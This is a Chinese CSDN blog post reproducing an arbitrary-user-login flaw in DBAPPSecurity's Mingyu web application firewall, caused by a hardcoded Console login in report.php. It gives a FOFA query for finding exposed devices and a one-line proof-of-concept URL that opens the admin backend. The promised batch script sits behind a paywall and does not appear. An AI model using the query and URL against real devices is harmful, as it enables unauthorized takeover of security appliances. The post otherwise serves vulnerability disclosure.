安恒明御WEB应用防火墙 report.php任意用户登录漏洞(含批量验证poc)

已于 2024-04-06 21:44:40 修改
阅读量101 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-06 21:44:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137439233
版权

1.漏洞介绍

安恒明御WEB应用防火墙,后简称云WAF,实现对网站及APP业务流量进行多维度、深层次的安全检测和防护。智能语义分析 :智能语义分析引擎基于词法分析和语法分析的SQL注入/XSS攻击检测与防御引擎。,AI智能防护 :采用先进的机器学习算法,降低安全引擎的误报率和漏报率,实现对未知威胁的检测防护。,云端智能抗D:与云端高防中心进行联动,提供3-7层的DDOS防护,提供7X24小时全天候服务 。

2022HW期间爆出,report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台

2.影响版本

未知

3.漏洞复现

fofa语法:

app="安恒信息-明御WAF"

POC:

http://x.x.x.x/report.m?a=rpc-timed


再次访问主页即可跳转到后台页面:

了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
运维审计与风险控制系统漏洞复现
The current road is different, love needs to distinguish between right and wrong
02-21 338
®运维审计与风险控制系统是安恒信息在多年运维安全管理的理论和实践经验积累的基础上,采用B/S架构,集“身份认证、账户管理、控制权限、日志审计”于一体,支持多种字符终端协议、文件传输协议、图形终端协议、远程应用协议的安全监控与历史查询,具备全方位运维风险控制能力的统一安全管理与审计产品。 没有人规定,一朵花一定要成长为向日葵或者玫瑰。
漏洞复现】某厂商明WEB应用防火墙任意用户登录漏洞
晚风不及你
03-02 1036
安恒明WEB应用防火墙(简称WAF)是杭州安恒信息技术股份有限公司自主研发的一款专业应用安全防护产品,专注于为网站、APP等Web业务系统提供安全防护。
安恒信息-明安全网关 命令执行漏洞分析
wangluoanquan111的博客
03-02 1038
注意漏洞描述漏洞位置漏洞代码。
Apache Struts2 再爆严重安全漏洞_Apache Struts2 再爆严重安全漏洞_详细网安自学路线
2401_84915584的博客
05-13 531
近日,各大网站都报道了黑客从征信企业 窃取了 1.43 亿美国人的详细个人信息,事件相关报导表明 框架存在安全漏洞。 是一种开源的 MVC 框架
Apache Struts2 再爆严重安全漏洞/Apache Struts2 再爆严重安全漏洞_入门黑客自学路线
最新发布
程序员六七的博客
05-13 432
近日,各大网站都报道了黑客从征信企业 窃取了 1.43 亿美国人的详细个人信息,事件相关报导表明 框架存在安全漏洞。 是一种开源的 MVC 框架
47:WAF绕过-漏洞发现之代理池指纹被动探针
mingyqf的博客
05-07 1217
47:WAF绕过-漏洞发现之代理池指纹被动探针 文章目录思维导图**漏洞发现触发WAF点-针对xray,awvs等****案例1:代理池Proxy_pool项目搭建及使用解释**这里我是直接用phpstudy 搭建redis**案例2:充钱代理池直接干safedog+BT+aliyun探针****案例3:safedog-awvs漏扫注入测试绕过-延时,白名单****案例4:Aliyun_os-awvs漏扫注入测试绕过-延时白名单****案例5:BT(baota)-awvs+xray漏扫payload绕过-延
WEB应用防火墙-用户操作手册V3.0.4.3.3.doc
05-06
"明WEB应用防火墙用户操作手册V3.0.4.3.3" 知识点: 1. 明WEB应用防火墙简介 明WEB应用防火墙(简称:WAF,WEB Application Firewall)是安恒信息结合多年应用安全的攻防理论和应急响应实践经验积累的基础上...
安恒信息明WEB应用防火墙产品白皮书.doc
11-09
安恒信息明WEB应用防火墙产品白皮书.doc
专题资料(2021-2022年)安恒信息明WEB应用防火墙产品白皮书.doc
10-08
专题资料
安恒信息明WEB应用防火墙产品白皮书.docx
10-10
安恒信息明WEB应用防火墙产品白皮书.docx
WEB应用防火墙产品配置手册V3.0.4.0.doc
06-24
WEB应用防火墙产品配置手册V3.0.4.0
安恒明WAF防火墙配置管理功能指南.pptx
10-13
安恒明WAF防火墙配置管理功能指南.pptx
安恒明WAF防火墙配置管理功能指南.pdf
10-13
安恒明WAF防火墙配置管理功能指南.pdf
安恒明WAF防火墙技术介绍.pdf
10-13
安恒明WAF防火墙技术介绍.pdf
安恒明WAF防火墙日志管理功能指南.pdf
10-13
安恒明WAF防火墙日志管理功能指南.pdf
安恒明WAF防火墙日志管理功能指南.pptx
10-13
安恒明WAF防火墙日志管理功能指南.pptx
安恒明WAF防火墙策略管理功能指南.pptx
10-13
安恒明WAF防火墙策略管理功能指南.pptx
安恒信息专家浅析WEB应用防火墙绕过测试技术.pdf
11-20
安恒信息专家浅析WEB应用防火墙绕过测试技术.pdf
安恒明审计0day漏洞
08-15
根据所提供的引用内容,我找不到与"安恒明审计0day漏洞"相关的信息。请提供更多的背景信息或者详细描述问题,以便我能够更好地回答你的问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [2019西湖论剑 | 安恒信息范渊:新时代网络安全需要“实智明归”](https://blog.csdn.net/weixin_34341229/article/details/89557181)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [最新漏洞POC_exp集合站 IT设备默认用户名密码 证语网络安全Lab](https://blog.csdn.net/weixin_42744595/article/details/132197898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值